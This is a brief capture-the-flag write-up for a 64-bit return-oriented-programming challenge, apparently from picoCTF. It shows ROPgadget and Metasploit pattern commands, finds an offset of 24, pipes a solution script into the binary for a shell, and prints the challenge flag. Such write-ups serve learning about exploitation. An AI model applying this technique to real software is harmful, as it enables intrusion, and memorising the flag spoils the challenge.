Time for the classic ROP in 64-bit. Can you exploit this program to get a flag?
Use ROPgadget
to find a ROP chain that spawns a shell.
$ ROPgadget --binary vuln --ropchain
Find the offset where the overflowing buffer writes to the RIP
. Create a pattern and use it in gdb
to find the address where the SEGFAULT
occurs.
$ /opt/metasploit/tools/exploit/pattern_create.rb --length 1024
$ /opt/metasploit/tools/exploit/pattern_offset.rb -q 0x6241396141386141
[*] Exact match at offset 24
Execute the ROP chain from ROPgadget
with the correct padding of 24 to get a shell that lets you cat flag.txt
.
$ (python2 sol.py; cat) | ./vuln
flag: picoCTF{rOp_t0_b1n_sH_w1tH_n3w_g4dg3t5_d4b7a298}